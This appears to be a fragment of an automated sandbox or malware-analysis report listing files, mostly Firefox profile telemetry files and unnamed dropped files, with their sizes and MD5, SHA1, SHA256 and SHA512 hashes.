SHA133ae3f32c5024a9286eb7011073c01f5c956bd7f
SHA2566fd612f2d8de4a8707a6ce1c084d0819a357b64079d91924fc7513525808cb01
SHA51244b145ccb40e90f3f66caa5808ed55f636123c61040285d8a04e7009655594717321d8371c2897770fe0c8d82c72ed0d5900fd7300e2174b063ced90ed7d045e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD51a6086ce2e96d7be24033d074fbb242a
SHA1df4a81d85bd27c774a38d35d0ef6d25ccf334bb7
SHA2569ad429ae0e739cb1e047ad1f87ec81ac4cb98c56778e55236dc02cbe1c247e71
SHA512f2f3327947c800c52669c193e1975454e35e80c67003f518049ee0c53b9fbea0f3341011671acc461fc30186553701dddb9bb2d6fbc30bb8ed204c9788832e4c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5a75664baca72396f5ecc6ce79bab4418
SHA14bb9f8dc7e6c3bcf7abae836d2c98ee623b9acb7
SHA256a9f267db774ed8ad62842ba577459f7bf56883a0539a9756294d433b521a0951
SHA51233e87838f0ce3ae970edf429b3cfcaff3b19602d57ce11fcf93bf899009feafd128127de894fccce64aa9f0383b47b072b3ebe2c17efc2a8ed59d5344bde8735
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\2c770be6-0a8e-4918-aae1-d7be612a65a8
Filesize982B
MD5735eed643595cad4fb8c8a2ebf4784a5
SHA1c9ce3e8d49fbf34b2c67411b0f30972bafcf7875
SHA2568e7a99a6eecf6b71051a42506bd7e0311df2cf49990293d8977a922574066b92
SHA512d9880437b2ee282422ace013bf6a1080fa0ef020276c80d695a02687e5e907352c50fe8d6f971d8df7cb47b8efcd12367c7ab1271779c87ee7cf4ce15450fe5a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\910ed03b-0883-4067-a503-b3c0da4ffe1e
Filesize26KB
MD59c7faa9d24eb2a8b478528cd2a8e580d
SHA16ed594df9070a92304fe4f1cafd593e351f8e82f
SHA256fd629f7c1cce0b6850bb68c223a3bd5529c5677d6b40e133e6c4e410df610c18
SHA5125b6226dcd2614675cd9c9837461b6bcaa1fb6f25ef3b88fd90dd424dbc4dd76b219923dd9f7e5262ddc1da8f6de20aa98bd7f5d925be7fd8bb13ba628f35b63c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\a0a42c66-f9f4-4201-880e-9d4202808c2d
Filesize671B
MD5bf8acecd7d893b7368082a1f1d43c637
SHA133295cbade54485f75769165f98c669d5d1796b4
SHA256195646d7eb01f087351e3d92e1740e6b0e2103066c06408df3b5479f195deedc
SHA51219de551efc70282ef957e1f8b63549c7c1fa8659bcbe3e446d650892aff0640b73b4d400ebd2ee5cb415f9c9c7954546b7617ed6d482d2b19bc05721ecaae67f
-
Filesize
11KB
MD5c674ded86cb2290c5c668c50e5913cd4
SHA1879ee16166488281075bf1bb8122622f3906e02b
SHA256aa44c9c26ef24970bc8ad9692daa8c5679a6c9c36afedaf85e352db90f87d1b6
SHA512c8c6c92f944390d658c3b66af66311ff1fbea45a9b7d82dd0ce771ae43a4a3c5c45c469e15651e4c9d20cf05ca41d58f70a3c9b468f520ccb810408c36c8cc59
-
Filesize
229B
MD586b5b2cc880f94b9f46313d7dc394f76
SHA196a52afba061f6a282da9f5157f247fe69fac9ff
SHA256eb2ca794339f4896ab581cf9076eb2795829b00b2a99fb5ab906db14a2a53d69
SHA512b8f9f8cc62cdde409bf0e9857f02785536510bbd3c969960b08e9629325bee0ae385b2e3d6562d162f1e95f56e2047b49159e9363a018d1d8f726b39155ab97d
-
Filesize
1.7MB
MD5a40e91dceb2d601a94a30078e762acb8
SHA1eb176422368b0ba0db84467fea83c78f6ad179be
SHA2562f5fd844443d22d37e00fc1dbcb8b23ee49251c952e63162799a2509d1c02876
SHA5126c02e3a8c3935fe9b0daeea3815bc4a2b549343dc0c6fc5046d2dc506992e7631cb9289fe036a13f2e5d996cbe7103aed37b64f5c635aa796cede404e1ce2c4e
-
Filesize
1.8MB
MD5ca87c3b458fdd0b7ae744986cf495c2a
SHA101c61f6b9e6bd4842dd732afab63fa99aab7f750
SHA2560b176edf0c85e70520ffe37231bf7fd94a0c76342fae0ae4f6789246e0b73806
SHA51260a2b0918c1872b7798158fa7c08a0df2cde3f7e1092c80dc70082497e45dfa75f4b2e7b9d0e393def28013a8b1d4ff0ee168015e3fa72f60b774b830dac3c81
-
Filesize
1.6MB
MD573e44b47466036e176d43a36baec6bc7
SHA120f95df96bb686042032fcbf03089c035f21ff61
SHA25669cb55ec80affd4a0a72642fd430fc8d6ef73b7df1b2c453a7831bf8e8a72dea
SHA512c149ac0577c549afb8629f00e5318b03e68499a0bfc49019a6b1ffb82c4b09e59e1621e62b54be53f40463eaf01117f5317c0eea20969655e91fce67d16f0044
-
Filesize
7.6MB
MD5b3af913ea44654d0d7337f26c70a84e6
SHA110030cf107513f254e9f8af911cdd807fd18ff41
SHA256ef68496216167f91240df59f3ea62ffde4fda062f33fa171ec220968803f4f8d
SHA51263ce2d81e53589f664b932aa6bf33a4a7b4edf2743f777c5e66fffba7c004bad5fd6303134ed898e4dae7edbd705b337b62d5b0f6bf5e4b4c206c3174d02f42a
-
Filesize
2.1MB
MD510e3f60522f816be1799db65ab6e1b9a
SHA1bd491725b3f2d7e9852d76c8bc5b9e4bbc3bc56b
SHA256c063ea3a5665ccee868bf1dd420175bc374612456f9d57ecf47020a8aa88baa4
SHA512076eb7cf401d3109537be3e0949b0d41ee8d96b5310172c4b613c0a4a0bf3e0c84caef90e3edba1e0fc920c32896ea28d3485df61dd1df9b80c23ca90b71f615
-
Filesize
48KB
MD5641669184b5f1b6ceb36effc33d1e919
SHA1ded672bf85a2f25036d56ec8f329c23da34f17e2
SHA2560a8d302629f3039c4f63a942e3f4e7af8734ece33d49461fcea9f1b3686a5486
SHA5121fb87ab985afc1ce0e2956956b5cda0422d7e94b6a39b818b331621897cf33dffa6b01f21a631969b8d243fde1b9f88d86e8eff24e08e0f4e364ee9d1d128fc9
-
Filesize
331KB
MD593c9eb9187d5623a566018fe0ef88f18
SHA1abd41e571b5c837ff62bdae09bea99acdcf8d1d3
SHA25649d0683d150023df2ef0c28e0135758432a20796de4499bbfaf324e7a9b1b467
SHA512135e61b4430e0c39ea20d7aee42a00497e942a0361fc63be00c47ada8ba6fbd7f271ccbc91a40c915dc652b9586140bfea4fd261288bd0359cf9412942d94746
-
Filesize
212B
MD58131979f096e72e0ff5bec78b8d5da8a
SHA1f215fb8c95db64cc5b7b98ebe4b5d0d05cdc441a
SHA2567b3352b1bd78efd784e5a62c33a87e0871ba11f6c4af5f578c2f7d5cbb7cea04
SHA5124c6e89aaf78e3491a474e739d2582c099c44191f0194c113fe5b2384c834f350e1a81236298d80ffb2890bbd821d63fcf516bd59853442a9cfbf97f1739e8abd
-
Filesize
6.3MB
MD51ec1ed8bb2dcea1c3f9d9f7542dbe245
SHA1d65d7a2fa1895d748194f560c757113ce903f088
SHA256b48e4eab11480e04415e8f202a0efccbde9f3e841b19e9399e579b63f39b60c9
SHA512ebe51a8074b884d44963b7bf82ed6206d15fda297fcaf530f1811c211771732c451e2b02d623031129cd8a27d569d667b04cdcca9acdef519c9862c5e374f3b2
-
Filesize
8KB
MD57e01d25eea6c947d909fafe621aca6ea
SHA1f0601188865e8c23f47c8a7d081563b4a239f2e9
SHA25664843f26127aee35a96b4191baac886f826df6fc53d80d5e7ec743522a279ef6
SHA512a998f145d7766b0571ef699fadecb1970367b27d6f1d4bae8ccca30eda3c412467e8af2dfe057ef0c931f33cc5dc09e87f6a8eba6385f445cca7ae4e00bf7a90
-
Filesize
204B
MD5c1ded4cb8c4630fb9a695f0e6f6293c2
SHA18d4474186ffb45a8f2380b6ef62fbdf8e990748b
SHA2568ef8a857f1fdf4a69067c745cfed62ef22050bd567f21539a46591f629b827df
SHA512823d342260a54c1af006be9541de1108057d252f0ae45c10b005f9b8796b06c236b77bfe224571150e879eaa34fc3c0100141a051fe0be311bb1f01436791fa1
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e